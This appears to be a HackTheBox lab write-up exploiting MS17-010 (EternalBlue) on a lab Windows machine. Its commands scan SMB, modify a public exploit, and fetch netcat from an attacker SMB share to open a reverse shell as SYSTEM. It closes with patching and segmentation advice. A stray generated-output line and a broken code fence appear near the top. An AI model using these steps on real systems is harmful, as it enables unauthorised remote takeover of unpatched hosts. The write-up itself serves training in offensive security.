## https://sploitus.com/exploit?id=D41C1873-5069-5079-AFB8-B3681BD52805
# HackTheBox: Legacy Writeup
An elegant, professional walkthrough demonstrating the exploitation of the **MS17-010 (EternalBlue)** vulnerability on a legacy Windows system. This writeup is structured to highlight offensive security methodologies, operational efficiency, and precise troubleshooting.
---
## Technical Overview
* **Target OS:** Windows (Legacy)
* **IP Address:** `10.10.10.4`
* **Difficulty:** Easy
* **Core Vulnerability:** MS17-010 (EternalBlue / SMBv1 Remote Code Execution)
* **Objective:** Gain NT AUTHORITY\\SYSTEM access and retrieve user/root flags.
---
## 1. Enumeration & Reconnaissance
The initial phase begins with an aggressive, full-port TCP SYN scan to locate active services while skipping host discovery (`-Pn`) and DNS resolution (`-n`) to optimize execution speed.
```
```text
File generated successfully.
```bash
nmap -n -Pn -sS -p- --min-rate 5000 10.10.10.4
```
### Scan Results
The reconnaissance reveals three highly characteristic open ports, pointing immediately toward standard Microsoft services:
* **Port 135:** MSRPC
* **Port 139:** NetBIOS-SSN
* **Port 445:** Microsoft-DS (SMB)
### Vulnerability Assessment
Given the presence of SMB (`445`) on a legacy Windows asset, we run Nmap's targeted NSE scripts to evaluate the system's susceptibility to known critical exploits.
```bash
nmap -p135,139,445 --script="safe and vuln" 10.10.10.4
```
* **Finding:** The system responds as highly vulnerable to the **MS17-010** critical security flaw, making SMB our primary attack vector.
---
## 2. Environment Setup & Dependency Resolution
To achieve Remote Code Execution reliably without relying on Metasploit, we utilize Worawit's public exploit suite.
```bash
git clone [https://github.com/worawit/ms17-010](https://github.com/worawit/ms17-010)
cd ms17-010
```
### Troubleshooting Legacy Python Dependencies
The original exploit code requires Python 2.x and specific versions of the `impacket` framework. To prevent compilation errors or missing module flags, the local environment must be prepared precisely:
```bash
# Upgrade package managers for Python 2
python2 -m pip install --upgrade setuptools pip
# Install the exact compatible Impacket library version
pip2 install impacket==0.9.24
```
With the environment stable, running `python2 checker.py 10.10.10.4` safely confirms the precise named pipes available for exploitation (e.g., `spoolss`).
---
## 3. Weaponization & Proof of Concept (PoC)
Before attempting a fully interactive reverse shell, it is critical to verify arbitrary command execution (Code Execution verification).
We modify the exploit script (`zzz_exploit.py`) inside the main execution block to substitute the default command with an ICMP echo request (ping) back to our attack interface:
```python
# Modified line within zzz_exploit.py
service_exec(conn, r'cmd /c ping -n 4 ')
```
To capture this interaction, we start an ICMP listener on our local host:
```bash
tcpdump -i tun0 icmp -n
```
Executing the exploit triggers the target machine to send outbound ICMP packets to our machine, confirming **successful unauthenticated Remote Code Execution**.
---
## 4. Exploitation & Post-Exploitation
### Staging the Payload
To establish an interactive reverse shell, we choose to transfer a clean standalone `nc.exe` (Netcat) binary to the target.
1. **Locate and copy the binary locally:**
```bash
cp /usr/share/seclists/Web-Shells/FuzzDB/nc.exe .
```
2. **Deploy an Impacket SMB Server to host the file:**
We initialize a local SMB share mapping our current working directory, allowing the victim host to retrieve the file over network shares.
```bash
sudo impacket-smbserver tools .
```
### Modifying Exploit for Shell Access
We adjust `zzz_exploit.py` again to instruct the target to execute our hosted `nc.exe` binary back to our listening port, attaching a command shell session (`cmd.exe`).
```bash
nano zzz_exploit.py
```
```python
# Updated service execution block
service_exec(conn, r'cmd /c \\\tools\nc.exe -e cmd 4444')
```
### Catching the Shell
Set up a Netcat listener on your machine to intercept the incoming shell connection:
```bash
nc -lvnp 4444
```
Execute the finalized exploit against the vulnerable target using the discovered `spoolss` named pipe:
```bash
python2 zzz_exploit.py 10.10.10.4 spoolss
```
---
## 5. Privilege Escalation & Flag Retrieval
Upon catching the connection, we immediately find ourselves inside a high-privilege context, eliminating the need for local privilege escalation:
```cmd
C:\\WINDOWS\\system32> whoami
nt authority\\system
```
### Looting Flags
Navigating legacy Windows filesystems requires utilizing short-name conventions (`DOCUME~1` for `Documents and Settings`) to circumvent directory spacing issues:
```cmd
cd C:\\
cd DOCUME~1
:: Access user flag
type John\\Desktop\\user.txt
:: Access root flag
type Administrator\\Desktop\\root.txt
```
---
### Key Takeaways & Defensive Recommendations
1. **Legacy Protocol Risk:** Leaving SMBv1 enabled exposes systems directly to unauthenticated remote code execution.
2. **Patch Management:** This exploit highlights the extreme risk of deferred patching cycles on legacy operating infrastructure. Ensure **MS17-010** updates are deployed across all Windows systems.
3. **Network Segmentation:** High-risk protocols like SMB (port 445) should never be exposed directly to untrusted networks without robust perimeter firewall rules.